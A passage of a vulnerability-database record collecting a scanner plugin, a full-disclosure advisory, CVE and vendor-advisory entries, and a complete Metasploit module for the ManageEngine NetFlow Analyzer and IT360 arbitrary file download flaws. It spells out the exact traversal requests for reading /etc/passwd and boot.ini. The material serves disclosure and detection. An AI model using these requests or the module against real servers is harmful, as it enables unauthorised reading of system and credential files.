\"CSVServlet?schFilePath=/etc/passwd\"\n);\n\nverify = make_list(\n \"<description>Windows Shell</description>\",\n \"root:\",\n \"<description>Windows Shell</description>\",\n \"root:\",\n \"<description>Windows Shell</description>\",\n \"root:\"\n);\n\nvurl = NULL;\nres = NULL;\nvuln = FALSE;\nfor(v = 0; v < max_index(vectors); v++)\n{\n # We only try the first 2 tests unless thorough_tests is on\n if(v > 1 && !thorough_tests)\n break;\n\n item = dir+\"netflow/servlet/\"+vectors[v];\n vurl = build_url(port:port, qs:item);\n reg = verify[v];\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : item,\n exit_on_fail : TRUE\n );\n\n if(\"200 OK\" >< res[0] && res[2] =~ reg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif(vuln)\n{\n\n file = \"Windows\\WindowsShell.Manifest\";\n if(\"passwd\" >< vurl)\n file = \"/etc/passwd\";\n\n security_report_v4(\n port : port,\n file : file,\n severity : SECURITY_WARNING,\n output : res[2],\n request : make_list(vurl)\n );\n exit(0);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2021-06-08T19:07:14", "bulletinFamily": "software", "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "description": "Directory traversal.", "edition": 2, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14133", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14133", "title": "NetFlow Analyzer security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-5446", "CVE-2014-5445"], "description": "\r\n\r\nHi,\r\n\r\nThis is part 9 of the ManageOwnage series. For previous parts see [1].\r\n\r\nToday we have yet another 0 day - an arbitrary file download\r\nvulnerability that be exploited unauthenticated in NetFlow Analyzer\r\nand authenticated in IT360.\r\nI'm releasing this as a 0 day because ManageEngine have been making a\r\nfool out of me for 105 days. I have asked them "are you releasing a\r\nfix soon?" at least a couple of times every month to which they always\r\nresponded "yes we will release in the next week/month". And then they\r\ndon't release the fix nor provide an explanation. See the advisory\r\ntimeline below for details.\r\n\r\nAn Metasploit auxiliary module that exploits this vulnerability has\r\nbeen submitted to the Metasploit Framework Github repo in [2].\r\n\r\nA full copy of the advisory below can be obtained from my repo in [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 30/11/2014 / Last updated: 30/11/2014\r\n\r\n>> Background on the affected product:\r\n"NetFlow Analyzer, a complete traffic analytics tool, leverages flow\r\ntechnologies to provide real time visibility into the network\r\nbandwidth performance. NetFlow Analyzer, primarily a bandwidth\r\nmonitoring tool, has been optimizing thousands of networks across the\r\nWorld by giving holistic view about their network bandwidth and\r\ntraffic patterns. NetFlow Analyzer is a unified solution that\r\ncollects, analyzes and reports about what your network bandwidth is\r\nbeing used for and by whom."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\nThis is being released as a 0-day because ManageEngine have been\r\ntwiddling their thumbs (and making a fool out of me) for 105 days. See\r\ntimeline below for explanation.\r\n\r\n\r\n>> Technical details:\r\nVulnerability: Arbitrary file download\r\nConstraints: unauthenticated in NetFlow; authenticated in IT360\r\nAffected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above\r\n\r\nCVE-2014-5445:\r\nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd\r\nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true\r\n\r\nCVE-2014-5446\r\nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini\r\n\r\nAll 3 servlets can be exploited in both Windows and Linux. A\r\nMetasploit module that exploits CVE-2014-5445 has been released.\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 105 days.\r\n\r\nTimeline of disclosure:\r\n18/08/2014\r\n- Requested contact via ManageEngine Security Response Center.\r\n\r\n19/08/2014\r\n- Received contact from the NetFlow Analyzer support team. Responded\r\nwith the security advisory above detailing the vulnerabilities.\r\n- Further back and forth explaining the vulnerabilities, how to\r\nexploit them and their impact.\r\n\r\n22/08/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "We do not have a ETA on this, I will check with our\r\nengineering team and update you."\r\n\r\n22/09/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "We expect that the new release will be within the\r\nnext couple of weeks".\r\n\r\n20/10/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "Our new release will be happening early by next\r\nweek, you can get the update in our NetFlow Analyzer website".\r\n- Asked if they are sure that the fix will be included in the new\r\nrelease. Received response "yes you are correct, the issue that you\r\nhave specified is fixed in new release".\r\n\r\n27/10/2014\r\n- NetFlow Analyzer version 10.2 released - still vulnerable.\r\n- Sent an email to ManageEngine asking if they are going to release a\r\nfix soon. Received response "We will release the PPM file of the\r\nupgrade soon, in which we have fixed the Vulnerability you mentioned".\r\n\r\n5/11/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "You can expect the release before this month end".\r\n\r\n28/11/2014\r\n- Requested information regarding the release date for the fix.\r\nReceived response "The PPM file is in testing phase and will be\r\nreleased in next Month".\r\n- Asked if they can commit to a date. Received response "the ppm is in\r\ntesting phase now, as it is one of the major release, we will not be\r\nable to give an exact date of release".\r\n\r\n30/11/2014\r\n- Realised that ManageEngine have been playing me for 105 days, and\r\nimmediately released advisory and exploit.\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\nhttp://seclists.org/fulldisclosure/2014/Nov/21\r\n\r\n[2]\r\nhttps://github.com/rapid7/metasploit-framework/pull/4282\r\n\r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt\r\n\r\n", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31473", "title": "[The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2022-05-04T17:35:47", "description": "", "cvss3": {}, "published": "2014-12-03T00:00:00", "type": "exploitdb", "title": "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2014-5445", "2014-5446", "CVE-2014-5445", "CVE-2014-5446"], "modified": "2014-12-03T00:00:00", "id": "EDB-ID:43895", "href": "https://www.exploit-db.com/exploits/43895", "sourceData": ">> Arbitrary file download in ManageEngine Netflow Analyzer and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 30/11/2014 / Last updated: 3/12/2014\r\n\r\n>> Background on the affected product:\r\n\"NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\nThis is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation.\r\n\r\n\r\n>> Technical details:\r\nVulnerability: Arbitrary file download\r\nConstraints: unauthenticated in NetFlow; authenticated in IT360\r\nAffected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above\r\n\r\nCVE-2014-5445:\r\nGET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd\r\nGET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\\\boot.ini&pdf=true\r\n\r\nCVE-2014-5446\r\nGET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini\r\n\r\nAll 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released.\r\n\r\n\r\n>> Fix: \r\nUNFIXED - ManageEngine failed to take action after 105 days.\r\n\r\nTimeline of disclosure:\r\n18/08/2014\r\n- Requested contact via ManageEngine Security Response Center.\r\n\r\n19/08/2014\r\n- Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities.\r\n- Further back and forth explaining the vulnerabilities, how to exploit them and their impact.\r\n\r\n22/08/2014\r\n- Requested information regarding the release date for the fix. Received response \"We do not have a ETA on this, I will check with our engineering team and update you.\"\r\n\r\n22/09/2014\r\n- Requested information regarding the release date for the fix. Received response \"We expect that the new release will be within the next couple of weeks\".\r\n\r\n20/10/2014\r\n- Requested information regarding the release date for the fix. Received response \"Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website\".\r\n- Asked if they are sure that the fix will be included in the new release. Received response \"yes you are correct, the issue that you have specified is fixed in new release\".\r\n\r\n27/10/2014\r\n- NetFlow Analyzer version 10.2 released - still vulnerable. \r\n- Sent an email to ManageEngine asking if they are going to release a fix soon. Received response \"We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned\".\r\n\r\n5/11/2014\r\n- Requested information regarding the release date for the fix. Received response \"You can expect the release before this month end\".\r\n\r\n28/11/2014\r\n- Requested information regarding the release date for the fix. Received response \"The PPM file is in testing phase and will be released in next Month\".\r\n- Asked if they can commit to a date. Received response \"the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release\".\r\n\r\n30/11/2014\r\n- Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit.\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43895", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:44:55", "description": "Directory traversal vulnerability in the DisplayChartPDF servlet in ZOHO ManageEngine Netflow Analyzer 8.6 through 10.2 and IT360 10.3 allows remote attackers and remote authenticated users to read arbitrary files via a .. (dot dot) in the filename parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-5446", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5446"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8.7", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8.5", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.9", "cpe:/a:zohocorp:manageengine_netflow_analyzer:8.6", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.5", "cpe:/a:zohocorp:manageengine_netflow_analyzer:10.2", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.8.6", "cpe:/a:zohocorp:manageengine_netflow_analyzer:10.0", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.1", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.6", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.0", "cpe:/a:zohocorp:manageengine_netflow_analyzer:9.7", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-5446", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5446", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:10.0:beta:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.9:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.7:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:9.8.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:44:52", "description": "Multiple absolute path traversal vulnerabilities in ZOHO ManageEngine Netflow Analyzer 8.6 through 10.2 and IT360 10.3 allow remote attackers or remote authenticated users to read arbitrary files via a full pathname in the schFilePath parameter to the (1) CSVServlet or (2) CReportPDFServlet servlet.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-5445", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5445"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_netflow_analyzer:10.2", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-5445", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5445", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:10.2:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:57:06", "description": "A directory traversal vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the filename parameter sent to the DisplayChartPDF servlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.", "cvss3": {}, "published": "2014-12-17T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine NetFlow Analyzer And IT360 DisplayChartPDF Directory Traversal (CVE-2014-5446)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5446"], "modified": "2014-12-17T00:00:00", "id": "CPAI-2014-2308", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:55:28", "description": "An arbitrary file download vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the schFilePath parameter sent to servlets in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to them.", "cvss3": {}, "published": "2014-12-31T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine NetFlow Analyzer And IT360 Multiple servlets Arbitrary File Download (CVE-2014-5445)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5445"], "modified": "2015-01-12T00:00:00", "id": "CPAI-2014-2341", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-10-07T23:03:30", "description": "This module exploits an arbitrary file download vulnerability in CSVServlet on ManageEngine NetFlow Analyzer. This module has been tested on both Windows and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you must escape the backslash with a backslash.\n", "edition": 2, "cvss3": {}, "published": "2014-11-30T00:12:37", "type": "metasploit", "title": "ManageEngine NetFlow Analyzer Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5445"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/NETFLOW_FILE_DOWNLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',\n 'Description' => %q{\n This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-5445' ],\n [ 'OSVDB', '115340' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],\n [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]\n ],\n 'DisclosureDate' => '2014-11-30'))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI',\n [ true, \"The base path to NetFlow Analyzer\", '/netflow' ]),\n OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\\\windows\\\\system.ini']),\n ])\n end\n\n\n def run\n # Create request\n begin\n print_status(\"Downloading file #{datastore['FILEPATH']}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),\n 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] },\n })\n rescue Rex::ConnectionError\n print_error(\"Could not connect.\")\n return\n end\n\n # Show data if needed\n if res && res.code == 200\n if res.body.to_s.bytesize == 0\n print_error(\"0 bytes returned, file does not exist or it is empty.\")\n return\n end\n vprint_line(res.body.to_s)\n fname = File.basename(datastore['FILEPATH'])\n\n path = store_loot(\n 'netflow.http',\n 'application/octet-stream',\n datastore['RHOST'],\n res.body,\n fname\n )\n print_good(\"File saved in: #{path}\")\n else\n print_error(\"Failed to download file.\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/netflow_file_download.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
